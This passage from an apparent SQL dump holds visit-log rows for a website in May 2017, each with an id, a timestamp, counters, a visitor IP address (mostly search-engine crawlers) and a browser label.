107871,1494240033,1,1,0,0,'216.244.66.237','other'),(107872,1494240367,1,0,1,0,'66.249.76.109',''),(107873,1494240631,1,1,0,0,'151.80.27.118','other'),(107874,1494241277,1,1,0,0,'91.196.178.100','chrome'),(107875,1494241295,1,1,0,0,'95.108.213.34','other'),(107876,1494241610,1,1,0,0,'164.132.161.20','other'),(107877,1494241860,1,1,0,0,'157.55.39.90','other'),(107878,1494241898,1,1,0,0,'164.132.161.44','other'),(107879,1494242164,1,1,0,0,'217.182.132.7','other'),(107880,1494242265,2,0,2,0,'66.249.76.47',''),(107881,1494242445,1,1,0,0,'8.29.198.26','other'),(107882,1494242615,1,1,0,0,'51.255.65.36','other'),(107883,1494242673,1,1,0,0,'217.182.132.30','other'),(107884,1494242688,1,1,0,0,'217.182.132.6','other'),(107885,1494242836,1,1,0,0,'37.73.232.50','other'),(107886,1494243310,1,1,0,0,'66.249.66.185','chrome'),(107887,1494243998,1,1,0,0,'217.182.132.149','other'),(107888,1494245010,1,1,0,0,'164.132.161.75','other'),(107889,1494246057,1,1,0,0,'217.182.132.77','other'),(107890,1494246658,1,1,0,0,'217.182.132.193','other'),(107891,1494246979,1,1,0,0,'51.255.65.34','other'),(107892,1494247099,1,1,0,0,'51.255.65.73','other'),(107893,1494247125,1,1,0,0,'217.182.132.70','other'),(107894,1494247329,1,1,0,0,'217.182.132.96','other'),(107895,1494247333,2,0,2,0,'66.249.66.182',''),(107896,1494247388,1,1,0,0,'40.77.167.34','other'),(107897,1494247419,1,1,0,0,'164.132.161.37','other'),(107898,1494248252,1,1,0,0,'216.244.66.237','other'),(107899,1494248262,1,1,0,0,'164.132.161.16','other'),(107900,1494248412,1,1,0,0,'164.132.161.13','other'),(107901,1494248521,1,1,0,0,'217.182.132.76','other'),(107902,1494249085,1,1,0,0,'164.132.161.25','other'),(107903,1494249264,1,1,0,0,'66.249.66.188','chrome'),(107904,1494249922,1,1,0,0,'95.108.179.15','other'),(107905,1494249953,2,2,0,0,'141.8.142.15','other'),(107906,1494250032,1,1,0,0,'80.70.77.132','chrome'),(107907,1494250065,1,1,0,0,'217.182.132.77','other'),(107908,1494250183,1,0,1,0,'66.249.76.108',''),(107909,1494251374,1,0,1,0,'66.249.76.108',''),(107910,1494251728,1,0,1,0,'68.180.231.24',''),(107911,1494252252,1,1,0,0,'51.255.65.42','other'),(107912,1494252336,1,1,0,0,'178.154.189.16','other'),(107913,1494252337,1,1,0,0,'93.158.152.59','other'),(107914,1494252512,2,2,0,0,'216.244.66.237','other'),(107915,1494252635,1,1,0,0,'137.74.207.120','other'),(107916,1494252795,1,1,0,0,'51.255.65.17','other'),(107917,1494252811,1,1,0,0,'66.249.76.108','chrome'),(107918,1494252864,1,1,0,0,'51.255.65.96','other'),(107919,1494252887,1,0,1,0,'66.249.76.47',''),(107920,1494253281,1,1,0,0,'8.29.198.25','other'),(107921,1494253497,1,1,0,0,'164.132.161.49','other'),(107922,1494253546,1,1,0,0,'217.182.132.71','other'),(107923,1494253834,1,1,0,0,'91.196.178.65','chrome'),(107924,1494253968,1,1,0,0,'217.182.132.24','other'),(107925,1494254285,1,1,0,0,'217.182.132.57','other'),(107926,1494255473,1,0,1,0,'66.249.76.47',''),(107927,1494255564,1,1,0,0,'217.182.132.21','other'),(107928,1494255605,1,1,0,0,'164.132.161.6','other'),(107929,1494255608,1,0,1,0,'66.249.76.107',''),(107930,1494255675,1,1,0,0,'157.55.39.90','other'),(107931,1494255712,1,1,0,0,'37.54.114.104','chrome'),(107932,1494256489,1,1,0,0,'164.132.161.64','other'),(107933,1494257048,1,1,0,0,'164.132.161.3','other'),(107934,1494258285,1,1,0,0,'217.182.132.59','other'),(107935,1494258335,1,1,0,0,'51.255.71.132','other'),(107936,1494259151,1,1,0,0,'164.132.161.12','other'),(107937,1494260024,1,0,1,0,'68.180.228.49',''),(107938,1494260328,1,1,0,0,'51.255.65.53','other'),(107939,1494260380,1,1,0,0,'164.132.162.159','other'),(107940,1494260523,1,1,0,0,'91.196.178.37','chrome'),(107941,1494260638,1,1,0,0,'217.182.132.184','other'),(107942,1494261445,1,1,0,0,'141.8.142.164','other'),(107943,1494261706,1,0,1,0,'66.249.66.185',''),(107944,1494261823,1,0,1,0,'66.249.76.47',''),(107945,1494261922,1,1,0,0,'78.111.186.179','chrome'),(107946,1494262003,1,1,0,0,'51.255.71.119','other'),(107947,1494262832,1,1,0,0,'60.180.26.2','other'),(107948,1494263190,1,1,0,0,'217.182.132.54','other'),(107949,1494263411,1,1,0,0,'66.249.66.197','chrome'),(107950,1494263521,1,1,0,0,'207.46.13.93','other'),(107951,1494263698,2,2,0,0,'164.132.161.94','other'),(107952,1494263747,1,1,0,0,'217.69.133.6','other'),(107953,1494263870,1,1,0,0,'164.132.161.64','other'),(107954,1494264111,1,1,0,0,'8.29.198.25','other'),(107955,1494264806,1,1,0,0,'51.255.65.65','other'),(107956,1494265090,1,1,0,0,'66.249.76.47','chrome'),(107957,1494265145,1,1,0,0,'141.8.142.164','other'),(107958,1494265162,1,1,0,0,'51.255.71.132','other'),(107959,1494265555,1,1,0,0,'217.69.133.221','other'),(107960,1494265674,1,1,0,0,'94.178.6.16','chrome'),(107961,1494265785,1,0,1,0,'68.180.228.49',''),(107962,1494265944,1,1,0,0,'217.182.132.19','other'),(107963,1494266596,1,1,0,0,'51.255.65.80','other'),(107964,1494266689,1,0,1,0,'66.249.66.188',''),(107965,1494267105,1,1,0,0,'51.255.65.8','other'),(107966,1494267492,1,1,0,0,'217.182.132.96','other'),(107967,1494267722,1,1,0,0,'137.74.201.108','other'),(107968,1494267834,1,1,0,0,'164.132.161.93','other'),(107969,1494268209,1,1,0,0,'157.55.39.90','other'),(107970,1494268232,1,1,0,0,'51.255.65.63','other'),(107971,1494268312,1,1,0,0,'164.132.161.29','other'),(107972,1494268602,1,0,1,0,'66.249.76.47',''),(107973,1494268611,1,0,1,0,'66.249.76.46',''),(107974,1494268765,1,1,0,0,'217.182.132.96','other'),(107975,1494269377,1,1,0,0,'217.182.132.34','other'),(107976,1494269636,1,1,0,0,'93.175.236.51','firefox'),(107977,1494269656,1,1,0,0,'5.255.253.83','other'),(107978,1494270802,1,1,0,0,'51.255.64.106','other'),(107979,1494270999,1,1,0,0,'217.182.132.21','other'),(107980,1494271075,1,1,0,0,'51.255.65.92','other'),(107981,1494271090,1,1,0,0,'137.74.203.194','other'),(107982,1494271467,1,1,0,0,'91.196.178.163','chrome'),(107983,1494271678,1,1,0,0,'164.132.162.158','other'),(107984,1494271879,1,1,0,0,'176.104.96.211','chrome'),(107985,1494271891,1,1,0,0,'95.108.179.15','other'),(107986,1494272159,1,0,1,0,'66.249.76.107',''),(107987,1494272259,1,0,1,0,'66.249.66.188',''),(107988,1494272412,1,1,0,0,'217.182.132.241','other'),(107989,1494272802,1,1,0,0,'5.9.111.70','other'),(107990,1494273264,1,1,0,0,'51.255.71.111','other'),(107991,1494273970,1,0,1,0,'66.249.76.108',''),(107992,1494274052,1,1,0,0,'51.255.65.88','other'),(107993,1494274223,1,1,0,0,'5.255.253.58','other'),(107994,1494274249,3,3,0,0,'95.108.213.7','other'),(107995,1494274252,1,1,0,0,'178.154.200.41','other'),(107996,1494274268,3,3,0,0,'141.8.132.43','other'),(107997,1494274278,4,4,0,0,'141.8.142.97','other'),(107998,1494274288,1,1,0,0,'37.9.113.46','other'),(107999,1494274294,1,1,0,0,'164.132.161.37','other'),(108000,1494274310,1,1,0,0,'141.8.142.48','other'),(108001,1494274323,1,1,0,0,'141.8.142.15','other'),(108002,1494274343,1,1,0,0,'178.154.189.29','other'),(108003,1494274365,1,1,0,0,'141.8.142.38','other'),(108004,1494274383,2,2,0,0,'5.255.253.83','other'),(108005,1494274399,1,1,0,0,'178.154.200.45','other'),(108006,1494274407,2,2,0,0,'141.8.142.154','other'),(108007,1494274415,4,4,0,0,'95.108.179.8','other'),(108008,1494274437,1,1,0,0,'93.158.152.59','other'),(108009,1494274444,1,1,0,0,'93.158.152.42','other'),(108010,1494274468,2,2,0,0,'93.158.152.77','other'),(108011,1494274476,1,1,0,0,'178.154.200.64','other'),(108012,1494274483,1,1,0,0,'178.154.189.16','other'),(108013,1494274499,2,2,0,0,'37.9.113.5','other'),(108014,1494274544,1,1,0,0,'178.154.200.60','other'),(108015,1494274547,1,1,0,0,'37.9.113.43','other'),(108016,1494274821,1,1,0,0,'164.132.161.47','other'),(108017,1494274931,1,1,0,0,'217.182.132.63','other'),(108018,1494274934,1,1,0,0,'8.29.198.26','other'),(108019,1494274985,1,1,0,0,'5.9.147.133','other'),(108020,1494275004,1,1,0,0,'51.255.65.41','other'),(108021,1494276157,1,1,0,0,'217.182.132.20','other'),(108022,1494276515,1,1,0,0,'217.182.132.4','other'),(108023,1494276929,1,1,0,0,'164.132.161.11','other'),(108024,1494277560,1,1,0,0,'157.55.39.90','other'),(108025,1494277718,1,1,0,0,'164.132.161.12','other'),(108026,1494277766,2,2,0,0,'212.22.215.137','chrome'),(108027,1494277828,1,1,0,0,'51.255.65.75','other'),(108028,1494278316,1,0,1,0,'66.249.76.45',''),(108029,1494278321,1,0,1,0,'66.249.66.185',''),(108030,1494279580,1,1,0,0,'164.132.161.60','other'),(108031,1494279685,2,0,2,0,'66.249.76.109',''),(108032,1494280750,1,1,0,0,'51.255.65.89','other'),(108033,1494280788,1,1,0,0,'217.182.132.61','other'),(108034,1494280908,3,3,0,0,'46.229.168.74','other'),(108035,1494280909,5,5,0,0,'46.229.168.71','other'),(108036,1494280913,4,4,0,0,'46.229.168.68','other'),(108037,1494280941,3,3,0,0,'46.229.168.66','other'),(108038,1494280950,1,1,0,0,'217.182.132.53','other'),(108039,1494280956,4,4,0,0,'46.229.168.65','other'),(108040,1494280964,3,3,0,0,'46.229.168.73','other'),(108041,1494280993,2,2,0,0,'46.229.168.69','other'),(108042,1494281016,4,4,0,0,'46.229.168.72','other'),(108043,1494281042,5,5,0,0,'46.229.168.70','other'),(108044,1494281126,1,1,0,0,'46.229.168.75','other'),(108045,1494281311,1,0,1,0,'66.249.76.107',''),(108046,1494281374,1,0,1,0,'66.249.76.47',''),(108047,1494281528,1,1,0,0,'95.108.213.34','other'),(108048,1494281758,1,0,1,0,'207.46.13.93',''),(108049,1494281763,1,1,0,0,'141.8.142.164','other'),(108050,1494281785,1,1,0,0,'51.255.65.17','other'),(108051,1494281914,2,0,2,0,'68.180.231.24',''),(108052,1494282201,1,1,0,0,'93.158.152.79','other'),(108053,1494282609,1,1,0,0,'164.132.161.73','other'),(108054,1494283691,1,0,1,0,'68.180.228.49',''),(108055,1494283962,1,0,1,0,'66.249.66.188',''),(108056,1494284001,1,1,0,0,'217.182.132.176','other'),(108057,1494284059,1,1,0,0,'51.255.65.57','other'),(108058,1494284668,1,1,0,0,'164.132.162.164','other'),(108059,1494284961,1,1,0,0,'164.132.161.9','other'),(108060,1494285763,1,1,0,0,'8.29.198.26','other'),(108061,1494285922,1,1,0,0,'51.255.65.22','other'),(108062,1494286184,1,1,0,0,'51.255.65.82','other'),(108063,1494286335,1,1,0,0,'217.182.132.31','other'),(108064,1494286908,1,1,0,0,'164.132.161.79','other'),(108065,1494287031,1,1,0,0,'164.132.161.14','other'),(108066,1494287280,1,0,1,0,'207.46.13.102',''),(108067,1494287558,1,1,0,0,'51.255.65.72','other'),(108068,1494287784,1,1,0,0,'51.255.71.112','other'),(108069,1494287911,1,1,0,0,'207.46.13.93','other'),(108070,1494288099,2,2,0,0,'95.108.213.34','other'),(108071,1494288105,1,1,0,0,'141.8.142.38','other'),(108072,1494288109,1,1,0,0,'5.255.253.63','other'),(108073,1494288113,1,1,0,0,'95.108.213.8','other'),(108074,1494288123,2,2,0,0,'141.8.142.164','other'),(108075,1494288128,2,2,0,0,'178.154.200.37','other'),(108076,1494288135,1,1,0,0,'141.8.142.154','other'),(108077,1494288149,2,2,0,0,'95.108.213.7','other'),(108078,1494288162,1,1,0,0,'141.8.142.15','other'),(108079,1494288775,1,1,0,0,'157.55.39.90','other'),(108080,1494289114,1,0,1,0,'68.180.231.24',''),(108081,1494289526,1,1,0,0,'164.132.161.68','other'),(108082,1494289989,1,1,0,0,'51.255.65.91','other'),(108083,1494290583,1,1,0,0,'137.74.207.119','other'),(108084,1494291019,1,1,0,0,'217.182.132.147','other'),(108085,1494291042,1,1,0,0,'164.132.161.10','other'),(108086,1494291239,1,1,0,0,'217.182.132.57','other'),(108087,1494291777,1,1,0,0,'51.255.65.44','other'),(108088,1494292206,1,0,1,0,'66.249.76.46',''),(108089,1494292618,1,1,0,0,'217.182.132.150','other'),(108090,1494292649,1,1,0,0,'51.255.65.83','other'),(108091,1494292834,1,1,0,0,'51.255.65.77','other'),(108092,1494292986,1,1,0,0,'217.182.132.65','other'),(108093,1494293215,1,1,0,0,'66.249.76.47','chrome'),(108094,1494293265,1,1,0,0,'51.255.65.61','other'),(108095,1494293505,1,1,0,0,'217.182.132.34','other'),(108096,1494293627,1,1,0,0,'217.69.133.68','other'),(108097,1494294334,1,0,1,0,'66.249.76.108',''),(108098,1494294687,1,1,0,0,'217.69.136.206','other'),(108099,1494294817,1,1,0,0,'157.55.39.90','other'),(108100,1494294849,1,1,0,0,'146.185.223.87','firefox'),(108101,1494294867,1,1,0,0,'51.255.65.16','other'),(108102,1494295188,1,1,0,0,'137.74.201.99','other'),(108103,1494295274,1,0,1,0,'66.249.76.107',''),(108104,1494295740,1,1,0,0,'162.210.196.98','other'),(108105,1494295856,1,1,0,0,'164.132.161.91','other'),(108106,1494295932,1,0,1,0,'66.249.76.45',''),(108107,1494296097,1,1,0,0,'51.255.65.84','other'),(108108,1494296308,1,1,0,0,'51.255.65.61','other'),(108109,1494296587,1,1,0,0,'8.29.198.27','other'),(108110,1494296676,1,1,0,0,'164.132.162.187','other'),(108111,1494297110,1,1,0,0,'51.255.65.19','other'),(108112,1494297168,1,1,0,0,'217.182.132.67','other'),(108113,1494297972,1,1,0,0,'164.132.161.10','other'),(108114,1494298404,1,0,1,0,'66.249.76.46',''),(108115,1494298415,1,0,1,0,'66.249.64.183',''),(108116,1494298510,1,1,0,0,'51.255.65.61','other'),(108117,1494298589,1,0,1,0,'68.180.228.49',''),(108118,1494299147,1,1,0,0,'51.255.65.92','other'),(108119,1494299466,1,1,0,0,'217.182.132.16','other'),(108120,1494299478,1,1,0,0,'164.132.161.10','other'),(108121,1494299535,2,2,0,0,'217.182.132.63','other'),(108122,1494299578,1,1,0,0,'141.8.142.164','other'),(108123,1494299770,1,1,0,0,'157.55.39.90','other'),(108124,1494299803,2,1,1,0,'207.46.13.93',''),(108125,1494299888,2,2,0,0,'178.154.189.3','other'),(108126,1494299958,1,1,0,0,'95.108.179.15','other'),(108127,1494299961,1,1,0,0,'5.255.253.58','other'),(108128,1494300017,2,2,0,0,'178.154.200.2','other'),(108129,1494300126,2,2,0,0,'141.8.142.38','other'),(108130,1494300217,1,1,0,0,'141.8.142.97','other'),(108131,1494300282,1,1,0,0,'137.74.207.159','other'),(108132,1494300297,1,1,0,0,'178.154.149.1','other'),(108133,1494300336,1,1,0,0,'178.154.149.3','other'),(108134,1494300377,1,1,0,0,'178.154.200.45','other'),(108135,1494300413,1,1,0,0,'5.255.253.43','other'),(108136,1494300417,1,1,0,0,'95.108.213.32','other'),(108137,1494300809,1,1,0,0,'164.132.161.92','other'),(108138,1494300830,1,1,0,0,'217.182.132.23','other'),(108139,1494301074,1,1,0,0,'217.182.132.187','other'),(108140,1494301531,1,1,0,0,'180.76.15.20','other'),(108141,1494301668,1,1,0,0,'51.255.65.37','other'),(108142,1494301791,1,1,0,0,'164.132.161.31','other'),(108143,1494302396,1,1,0,0,'217.182.132.57','other'),(108144,1494302669,1,1,0,0,'51.255.64.106','other'),(108145,1494302873,1,1,0,0,'217.182.132.184','other'),(108146,1494303392,1,0,1,0,'40.77.167.34',''),(108147,1494303396,1,1,0,0,'217.182.132.96','other'),(108148,1494303598,1,1,0,0,'91.209.11.236','other'),(108149,1494303854,1,1,0,0,'51.255.65.25','other'),(108150,1494304242,1,1,0,0,'164.132.161.88','other'),(108151,1494304270,1,1,0,0,'164.132.161.27','other'),(108152,1494305467,1,1,0,0,'51.255.65.55','other'),(108153,1494305606,1,1,0,0,'164.132.161.57','other'),(108154,1494305653,1,1,0,0,'180.76.15.134','other'),(108155,1494306010,1,1,0,0,'217.182.132.155','other'),(108156,1494306291,1,1,0,0,'217.182.132.30','other'),(108157,1494306609,1,1,0,0,'164.132.161.14','other'),(108158,1494306641,1,1,0,0,'164.132.161.70','other'),(108159,1494306926,1,1,0,0,'46.48.13.161','chrome'),(108160,1494307345,1,1,0,0,'217.182.132.27','other'),(108161,1494307410,1,1,0,0,'8.29.198.26','other'),(108162,1494307562,1,1,0,0,'66.102.9.35','chrome'),(108163,1494307905,1,1,0,0,'217.182.132.87','other'),(108164,1494308073,1,1,0,0,'51.255.71.123','other'),(108165,1494308239,1,1,0,0,'164.132.161.58','other'),(108166,1494308294,1,0,1,0,'66.249.66.202',''),(108167,1494308659,1,0,1,0,'66.249.66.182',''),(108168,1494308800,1,1,0,0,'164.132.161.29','other'),(108169,1494309085,1,1,0,0,'51.255.65.10','other'),(108170,1494309487,1,1,0,0,'157.55.39.90','other'),(108171,1494309666,1,0,1,0,'68.180.231.24',''),(108172,1494309691,1,0,1,0,'66.249.76.47',''),(108173,1494309697,1,1,0,0,'66.102.9.25','chrome'),(108174,1494309827,1,1,0,0,'164.132.161.44','other'),(108175,1494309928,1,1,0,0,'217.182.132.93','other'),(108176,1494310044,1,0,1,0,'68.180.228.49',''),(108177,1494310523,1,1,0,0,'66.249.66.185','chrome'),(108178,1494311104,1,1,0,0,'51.255.65.95','other'),(108179,1494311175,1,1,0,0,'137.74.207.159','other'),(108180,1494311451,1,0,1,0,'66.249.76.108',''),(108181,1494311506,1,1,0,0,'92.112.249.169','chrome'),(108182,1494311664,1,0,1,0,'66.249.76.107',''),(108183,1494312068,1,1,0,0,'164.132.161.93','other'),(108184,1494312151,1,1,0,0,'164.132.161.87','other'),(108185,1494312167,6,6,0,0,'69.30.198.186','other'),(108186,1494312200,1,1,0,0,'164.132.161.86','other'),(108187,1494312578,1,0,1,0,'68.180.228.49',''),(108188,1494312728,1,1,0,0,'164.132.161.61','other'),(108189,1494312873,1,1,0,0,'164.132.162.188','other'),(108190,1494313065,1,1,0,0,'217.182.132.80','other'),(108191,1494313391,1,0,1,0,'66.249.76.107',''),(108192,1494313404,1,1,0,0,'217.182.132.65','other'),(108193,1494313565,1,1,0,0,'8.37.232.245','other'),(108194,1494313581,1,1,0,0,'217.182.132.16','other'),(108195,1494313584,1,1,0,0,'176.193.99.13','chrome'),(108196,1494313585,1,1,0,0,'46.188.61.117','chrome'),(108197,1494313907,1,1,0,0,'157.55.39.90','other'),(108198,1494314165,1,0,1,0,'66.249.76.47',''),(108199,1494314264,1,1,0,0,'217.182.132.53','other'),(108200,1494314268,1,1,0,0,'37.53.226.197','chrome'),(108201,1494314527,1,1,0,0,'141.8.132.39','other'),(108202,1494314561,1,1,0,0,'95.132.121.64','chrome'),(108203,1494314564,2,2,0,0,'178.154.200.37','other'),(108204,1494314652,1,1,0,0,'5.255.253.63','other'),(108205,1494314828,2,2,0,0,'178.154.200.45','other'),(108206,1494314838,1,1,0,0,'217.182.132.55','other'),(108207,1494314859,2,2,0,0,'141.8.142.154','other'),(108208,1494314942,1,1,0,0,'93.158.152.79','other'),(108209,1494314946,1,1,0,0,'178.154.200.64','other'),(108210,1494314986,1,1,0,0,'95.108.213.7','other'),(108211,1494315508,1,1,0,0,'217.182.132.178','other'),(108212,1494315706,1,0,1,0,'66.249.76.108',''),(108213,1494316089,1,1,0,0,'91.196.178.36','chrome'),(108214,1494316312,1,0,1,0,'66.249.76.47',''),(108215,1494316565,1,1,0,0,'164.132.161.28','other'),(108216,1494316631,1,0,1,0,'66.249.76.46',''),(108217,1494316678,6,6,0,0,'118.89.241.47','other'),(108218,1494316693,1,1,0,0,'94.43.147.115','chrome'),(108219,1494317144,1,1,0,0,'164.132.161.25','other'),(108220,1494317175,1,1,0,0,'217.182.132.151','other'),(108221,1494317439,1,0,1,0,'66.249.76.108',''),(108222,1494317929,1,1,0,0,'217.182.132.193','other'),(108223,1494318187,1,1,0,0,'51.255.71.126','other'),(108224,1494318208,1,1,0,0,'51.255.65.8','other'),(108225,1494318227,1,1,0,0,'164.132.161.35','other'),(108226,1494318241,1,1,0,0,'8.29.198.26','other'),(108227,1494318313,1,1,0,0,'217.182.132.22','other'),(108228,1494318317,1,1,0,0,'51.255.64.106','other'),(108229,1494318363,1,1,0,0,'164.132.161.14','other'),(108230,1494318418,1,1,0,0,'164.132.161.26','other'),(108231,1494318440,1,1,0,0,'217.182.132.155','other'),(108232,1494318863,1,1,0,0,'51.255.65.38','other'),(108233,1494319331,1,0,1,0,'66.249.76.45',''),(108234,1494319394,1,1,0,0,'164.132.161.79','other'),(108235,1494319813,1,1,0,0,'51.255.71.112','other'),(108236,1494320151,1,1,0,0,'46.175.134.163','chrome'),(108237,1494320524,1,1,0,0,'51.255.65.32','other'),(108238,1494320725,1,1,0,0,'51.255.65.26','other'),(108239,1494320985,1,1,0,0,'51.255.65.74','other'),(108240,1494321026,1,1,0,0,'51.255.65.11','other'),(108241,1494321236,1,1,0,0,'91.196.178.39','chrome'),(108242,1494321459,1,1,0,0,'164.132.161.42','other'),(108243,1494322142,2,2,0,0,'95.108.179.15','other'),(108244,1494322381,1,1,0,0,'51.255.71.100','other'),(108245,1494322509,1,1,0,0,'94.178.6.16','chrome'),(108246,1494322512,1,1,0,0,'141.8.142.15','other'),(108247,1494322707,2,2,0,0,'95.108.213.34','other'),(108248,1494323080,3,3,0,0,'95.108.213.7','other'),(108249,1494323085,2,2,0,0,'95.108.213.8','other'),(108250,1494323091,1,1,0,0,'178.154.200.2','other'),(108251,1494323098,1,1,0,0,'141.8.142.97','other'),(108252,1494323102,1,1,0,0,'95.108.179.15','other'),(108253,1494323179,1,1,0,0,'51.255.64.106','other'),(108254,1494323229,1,1,0,0,'51.255.65.10','other'),(108255,1494323401,1,1,0,0,'217.182.132.80','other'),(108256,1494323776,1,1,0,0,'217.182.132.18','other'),(108257,1494324068,1,1,0,0,'217.182.132.60','other'),(108258,1494324318,1,1,0,0,'51.255.71.129','other'),(108259,1494325153,1,1,0,0,'164.132.161.19','other'),(108260,1494325456,1,1,0,0,'178.154.200.45','other'),(108261,1494325530,2,2,0,0,'95.108.213.34','other'),(108262,1494325536,1,1,0,0,'5.255.253.63','other'),(108263,1494325555,1,1,0,0,'51.255.65.70','other'),(108264,1494325796,1,1,0,0,'199.58.86.206','other'),(108265,1494325855,1,1,0,0,'95.108.213.7','other'),(108266,1494326231,1,1,0,0,'51.255.71.120','other'),(108267,1494326296,1,1,0,0,'217.182.132.51','other'),(108268,1494326475,1,1,0,0,'5.255.253.70','other'),(108269,1494326476,1,1,0,0,'51.255.65.10','other'),(108270,1494326479,1,1,0,0,'141.8.142.17','other'),(108271,1494326482,1,1,0,0,'141.8.142.164','other'),(108272,1494326506,1,1,0,0,'51.255.65.6','other'),(108273,1494326527,1,1,0,0,'5.255.253.28','other'),(108274,1494326597,1,1,0,0,'51.255.65.4','other'),(108275,1494326611,1,1,0,0,'51.255.65.15','other'),(108276,1494326625,1,1,0,0,'207.46.13.93','other'),(108277,1494326957,1,1,0,0,'51.255.65.39','other'),(108278,1494327015,1,1,0,0,'91.196.178.135','chrome'),(108279,1494327203,1,1,0,0,'95.108.213.7','other'),(108280,1494327270,3,3,0,0,'141.8.142.15','other'),(108281,1494327503,1,1,0,0,'51.255.65.35','other'),(108282,1494327509,1,1,0,0,'5.255.253.63','other'),(108283,1494327698,1,1,0,0,'51.255.65.87','other'),(108284,1494327763,1,1,0,0,'5.255.253.43','other'),(108285,1494327801,1,1,0,0,'141.8.142.154','other'),(108286,1494327805,1,1,0,0,'37.9.113.38','other'),(108287,1494327806,1,1,0,0,'51.255.65.65','other'),(108288,1494327810,1,1,0,0,'141.8.132.39','other'),(108289,1494327815,1,1,0,0,'93.158.152.79','other'),(108290,1494327857,1,1,0,0,'164.132.161.15','other'),(108291,1494327950,1,1,0,0,'95.108.213.34','other'),(108292,1494328008,1,1,0,0,'207.46.13.93','other'),(108293,1494328012,1,1,0,0,'141.8.142.164','other'),(108294,1494328555,1,1,0,0,'137.74.207.161','other'),(108295,1494328721,1,0,1,0,'66.249.76.113',''),(108296,1494329064,1,1,0,0,'8.29.198.26','other'),(108297,1494329156,1,1,0,0,'164.132.161.12','other'),(108298,1494329519,1,1,0,0,'5.255.253.63','other'),(108299,1494329665,1,1,0,0,'141.8.142.28','other'),(108300,1494330117,1,1,0,0,'217.182.132.53','other'),(108301,1494331955,1,1,0,0,'164.132.161.14','other'),(108302,1494331974,1,1,0,0,'78.111.186.155','chrome'),(108303,1494332194,1,1,0,0,'217.182.132.24','other'),(108304,1494332332,1,1,0,0,'91.196.178.37','chrome'),(108305,1494332859,1,1,0,0,'51.255.65.40','other'),(108306,1494332939,1,1,0,0,'51.255.71.131','other'),(108307,1494333199,1,0,1,0,'66.249.76.135',''),(108308,1494333226,1,1,0,0,'216.244.66.237','other'),(108309,1494333482,1,1,0,0,'164.132.161.38','other'),(108310,1494333489,1,1,0,0,'51.255.65.10','other'),(108311,1494333556,1,1,0,0,'51.255.71.125','other'),(108312,1494334167,1,1,0,0,'180.76.15.22','other'),(108313,1494334794,1,1,0,0,'51.255.65.51','other'),(108314,1494334948,1,1,0,0,'217.182.132.94','other'),(108315,1494334952,1,0,1,0,'157.55.39.90',''),(108316,1494335188,1,1,0,0,'77.52.193.126','chrome'),(108317,1494335622,1,1,0,0,'217.182.132.71','other'),(108318,1494336171,1,1,0,0,'164.132.161.84','other'),(108319,1494336507,1,1,0,0,'51.255.71.132','other'),(108320,1494336708,1,0,1,0,'66.249.76.113',''),(108321,1494336840,1,1,0,0,'217.182.132.67','other'),(108322,1494337309,1,1,0,0,'82.145.222.142','other'),(108323,1494337548,1,1,0,0,'213.136.91.205','other'),(108324,1494337698,1,1,0,0,'217.182.132.155','other'),(108325,1494338074,1,1,0,0,'51.255.65.35','other'),(108326,1494338470,1,1,0,0,'207.46.13.102','other'),(108327,1494338796,1,1,0,0,'51.255.65.82','other'),(108328,1494339003,1,1,0,0,'217.182.132.53','other'),(108329,1494339582,1,1,0,0,'217.182.132.88','other'),(108330,1494339650,1,0,1,0,'66.249.66.182',''),(108331,1494339893,1,1,0,0,'8.29.198.27','other'),(108332,1494339975,1,1,0,0,'217.182.132.171','other'),(108333,1494340052,1,1,0,0,'164.132.161.26','other'),(108334,1494340410,1,1,0,0,'51.255.65.20','other'),(108335,1494340538,1,1,0,0,'164.132.161.75','other'),(108336,1494340714,1,1,0,0,'51.255.65.30','other'),(108337,1494341369,1,1,0,0,'51.255.65.95','other'),(108338,1494341720,1,1,0,0,'180.76.15.151','other'),(108339,1494341836,1,1,0,0,'157.55.39.90','other'),(108340,1494342137,1,1,0,0,'164.132.161.49','other'),(108341,1494342191,1,1,0,0,'91.205.206.83','chrome'),(108342,1494342283,1,0,1,0,'66.249.76.137',''),(108343,1494342292,2,2,0,0,'95.108.213.7','other'),(108344,1494342339,2,2,0,0,'141.8.142.164','other'),(108345,1494342384,1,1,0,0,'95.108.179.15','other'),(108346,1494342456,1,1,0,0,'5.255.253.81','other'),(108347,1494342520,1,1,0,0,'51.255.65.69','other'),(108348,1494342984,1,1,0,0,'51.255.65.63','other'),(108349,1494343015,1,1,0,0,'95.132.12.140','chrome'),(108350,1494343771,1,1,0,0,'217.182.132.151','other'),(108351,1494343971,1,1,0,0,'91.196.178.165','chrome'),(108352,1494343988,1,0,1,0,'66.249.76.89',''),(108353,1494344418,1,1,0,0,'164.132.161.13','other'),(108354,1494344445,1,0,1,0,'66.249.76.108',''),(108355,1494345004,1,1,0,0,'164.132.161.33','other'),(108356,1494345517,1,0,1,0,'157.55.39.90',''),(108357,1494346114,1,1,0,0,'66.249.93.202','chrome'),(108358,1494346228,1,1,0,0,'51.255.65.60','other'),(108359,1494346270,1,1,0,0,'51.255.65.97','other'),(108360,1494346337,1,1,0,0,'137.74.207.101','other'),(108361,1494346368,1,1,0,0,'164.132.161.87','other'),(108362,1494346699,1,0,1,0,'68.180.228.49',''),(108363,1494346823,1,1,0,0,'217.182.132.67','other'),(108364,1494347085,1,1,0,0,'217.182.132.97','other'),(108365,1494347763,1,1,0,0,'91.196.178.135','chrome'),(108366,1494348065,1,1,0,0,'180.76.15.34','other'),(108367,1494348129,1,1,0,0,'51.255.65.25','other'),(108368,1494349043,1,0,1,0,'66.249.76.89',''),(108369,1494349079,3,3,0,0,'141.8.132.72','other'),(108370,1494349082,2,2,0,0,'141.8.132.25','other'),(108371,1494349086,2,2,0,0,'5.255.253.81','other'),(108372,1494349089,1,1,0,0,'95.108.213.34','other'),(108373,1494349092,1,1,0,0,'178.154.189.3','other'),(108374,1494349094,1,1,0,0,'5.255.253.58','other'),(108375,1494349097,1,1,0,0,'93.158.152.60','other'),(108376,1494349101,1,1,0,0,'178.154.149.3','other'),(108377,1494349104,4,4,0,0,'178.154.200.37','other'),(108378,1494349107,1,1,0,0,'5.255.253.83','other'),(108379,1494349109,1,1,0,0,'178.154.149.1','other'),(108380,1494349124,1,1,0,0,'141.8.142.42','other'),(108381,1494349127,1,1,0,0,'178.154.200.45','other'),(108382,1494349133,1,1,0,0,'93.158.152.79','other'),(108383,1494349135,2,2,0,0,'95.108.179.15','other'),(108384,1494349143,1,1,0,0,'5.255.253.28','other'),(108385,1494349147,1,1,0,0,'37.9.113.38','other'),(108386,1494349788,1,1,0,0,'164.132.161.41','other'),(108387,1494349924,1,1,0,0,'217.